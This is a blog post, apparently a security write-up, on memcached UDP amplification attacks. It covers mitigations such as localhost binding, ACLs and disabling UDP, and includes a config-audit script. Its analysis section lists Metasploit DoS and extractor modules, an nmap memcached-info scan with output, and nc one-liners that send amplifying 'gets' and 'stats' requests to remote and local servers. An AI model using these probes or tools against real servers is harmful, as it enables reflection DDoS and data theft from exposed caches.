
메리메리쩜넷넷


Memcached Stuff

Kevin 2018.03.01 19:27 Views: 410

1. Overview

1.1. (US-CERT) UDP-Based Amplification Attacks

(2018. Feb. 28. revised)

https://www.us-cert.gov/ncas/alerts/TA14-017A

UDP-Based Amplification Attacks.JPG

 

1.2. Reflectors

stats_proving.JPG

 

1.3. Reflection Attack Vector

memcached.png

 

 

2. Mitigation

2.1. Ensure that memcached servers are configured to use industry-standard best current practices (BCP). This includes:

*using source-address validation to filter ingress traffic (BCP38/BCP84)

*using access control lists (ACL) to restrict source IP addresses/ports and limit traffic.

 

2.2. Change the memcached configuration settings for CACHESIZE and -l:

Open /etc/memcached.conf in a text editor.

Locate the -m parameter.

Change its value to at least 1GB.

Locate the -l parameter.

Change its value to 127.0.0.1 or localhost.

Save your changes to memcached.conf and exit the text editor.

Restart memcached.

 

2.3. Binding localhost only

Blocking port 11211 in your firewall is a good first step. For memcached users, if UDP is not used in your deployment, you can disable the feature with the switch -U 0. Otherwise, limiting access to localhost with the switch --listen 127.0.0.1 is advisable.
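A small auditor for the settings in 2.2 and 2.3, added here as an example (not code from the original post or from the memcached project): it reads memcached.conf-style text and reports any non-loopback -l/--listen address and any configuration that lacks -U 0. The function names and sample files are constructed, and flagging a missing -U is this example's own conservative assumption.

```python
import ipaddress

# -l/--listen and -U are the switches named above; --udp-port is the long form of -U.
ALIASES = {"-l": "listen", "--listen": "listen", "-U": "udp", "--udp-port": "udp"}

# Constructed sample files (not taken from the page).
EXPOSED = "-m 64\n-p 11211\n-u memcache\n# -l 127.0.0.1\n-l 0.0.0.0\n"
HARDENED = "-m 1024\n-p 11211\n-u memcache\n-l 127.0.0.1  # loopback only\n-U 0\n"

def parse_conf(text):
    """Collect listen addresses and the UDP port from memcached.conf-style text."""
    found = {"listen": [], "udp": None}
    for raw in text.splitlines():
        tokens = raw.split("#", 1)[0].replace("=", " ", 1).split()
        for i, tok in enumerate(tokens):
            if tok in ALIASES and i + 1 < len(tokens):
                key, val = ALIASES[tok], tokens[i + 1]  # "-l 127.0.0.1", "--listen=..."
            elif tok[:2] in ("-l", "-U") and len(tok) > 2:
                key, val = ALIASES[tok[:2]], tok[2:]    # attached form such as "-U0"
            else:
                continue
            if key == "listen":
                found["listen"] += [a for a in val.split(",") if a]
            else:
                found["udp"] = val
    return found

def is_loopback(host):
    """True for localhost or a loopback IP, with an optional :port suffix."""
    if host.startswith("["):            # "[::1]:11211"
        host = host[1:].split("]", 1)[0]
    elif host.count(":") == 1:          # "127.0.0.1:11211"
        host = host.split(":", 1)[0]
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return host == "localhost"      # any other name or wildcard counts as exposed

def audit(text):
    """Return findings; an empty list means loopback-only with UDP switched off."""
    conf, findings = parse_conf(text), []
    if not conf["listen"]:
        findings.append("no -l/--listen: memcached binds every interface")
    for addr in conf["listen"]:
        if not is_loopback(addr):
            findings.append(f"listens on non-loopback address {addr}")
    if conf["udp"] != "0":
        findings.append(f"UDP not disabled with -U 0 (configured value: {conf['udp']})")
    return findings
```

Call audit() on the contents of /etc/memcached.conf; an empty list means both checks passed.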

 

3. Analysis

3.1. memcached nse

https://nmap.org/nsedoc/scripts/memcached-info.html

 

3.2. memcache hacking tool (blackhat usa)

https://github.com/sensepost/go-derper

 

3.3. memcached metasploit module

https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/misc/memcached.rb

 

3.4. memcached extractor usage

      msf > use auxiliary/gather/memcached_extractor
      msf auxiliary(memcached_extractor) > show actions
            ...actions...
      msf auxiliary(memcached_extractor) > set ACTION <action-name>
      msf auxiliary(memcached_extractor) > show options
            ...show and set options...
      msf auxiliary(memcached_extractor) > run

 

3.5. grabbing info

      $ sudo nmap $TARGET -p 11211 -sU -sS --script memcached-info
      Starting Nmap 7.50SVN ( https://nmap.org ) at 2018-03-02 11:51 KST
      Failed to resolve "TARGET".
      Nmap scan report for xx.xx.xx.xx
      Host is up (0.015s latency).

      PORT      STATE         SERVICE
      11211/tcp open          memcache
      | memcached-info:
      |   Process ID           18120
      |   Uptime               2665702 seconds
      |   Server time          2018-03-02T02:51:13
      |   Architecture         64 bit
      |   Used CPU (user)      252.545607
      |   Used CPU (system)    982.822588
      |   Current connections  5
      |_  Total connections    19883412
      11211/udp open|filtered memcache

 

3.6. simulate amplification for remotehost

python -c "print '\0\x01\0\0\0\x01\0\0gets a b c d e f g h j k l m n o p q r s t w v u x y a\r\n'" |nc -nvvu xx.xx.xx.xx 11211 >/tmp/null

request.JPG

 

response.JPG

The response was 4,238 times the size of the request (requested: 107 bytes, responded: 453,564 bytes).

 
3.7. simulate amplification for localhost
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211
 
 